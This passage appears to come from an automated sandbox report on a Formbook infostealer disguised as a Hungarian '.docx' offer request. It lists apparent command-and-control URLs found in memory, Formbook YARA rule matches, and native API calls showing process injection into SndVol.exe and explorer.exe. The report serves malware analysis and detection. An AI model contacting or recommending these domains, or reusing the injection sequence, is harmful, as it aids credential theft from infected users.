          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site/d05n/www.egakids.shop
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.siteReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop/d05n/www.ental-implants-50062.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shopReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design/d05n/www.xc31.top
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.designReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bond
          Source: explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bond/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bondReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music/d05n/www.upta.bio
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.musicReferer:
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe PID: 6928, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SndVol.exe PID: 2664, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 4948, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029BB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx | 0_2_029BB118
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029B7A2C NtAllocateVirtualMemory | 0_2_029B7A2C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029BDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose | 0_2_029BDC8C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029BDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile | 0_2_029BDC04
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029B7D78 NtWriteVirtualMemory | 0_2_029B7D78
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose | 0_2_029BDD70
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029B7A2A NtAllocateVirtualMemory | 0_2_029B7A2A
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029BDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile | 0_2_029BDBB0
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029B8D70 GetThreadContext,SetThreadContext,NtResumeThread | 0_2_029B8D70
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | Code function: 0_2_029B8D6E GetThreadContext,SetThreadContext,NtResumeThread | 0_2_029B8D6E
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA460 NtClose | 5_2_047DA460
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA510 NtAllocateVirtualMemory | 5_2_047DA510
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA330 NtCreateFile | 5_2_047DA330
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA3E0 NtReadFile | 5_2_047DA3E0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA45B NtClose | 5_2_047DA45B
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_047DA48A NtReadFile | 5_2_047DA48A
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2E80 NtReadVirtualMemory,LdrInitializeThunk | 5_2_365D2E80
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk | 5_2_365D2EA0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2F30 NtCreateSection,LdrInitializeThunk | 5_2_365D2F30
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2FE0 NtCreateFile,LdrInitializeThunk | 5_2_365D2FE0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2F90 NtProtectVirtualMemory,LdrInitializeThunk | 5_2_365D2F90
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2FB0 NtResumeThread,LdrInitializeThunk | 5_2_365D2FB0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2C70 NtFreeVirtualMemory,LdrInitializeThunk | 5_2_365D2C70
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2CA0 NtQueryInformationToken,LdrInitializeThunk | 5_2_365D2CA0
          Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 5_2_365D2D10 NtMapViewOfSection,LdrInitializeThunk | 5_2_365D2D10
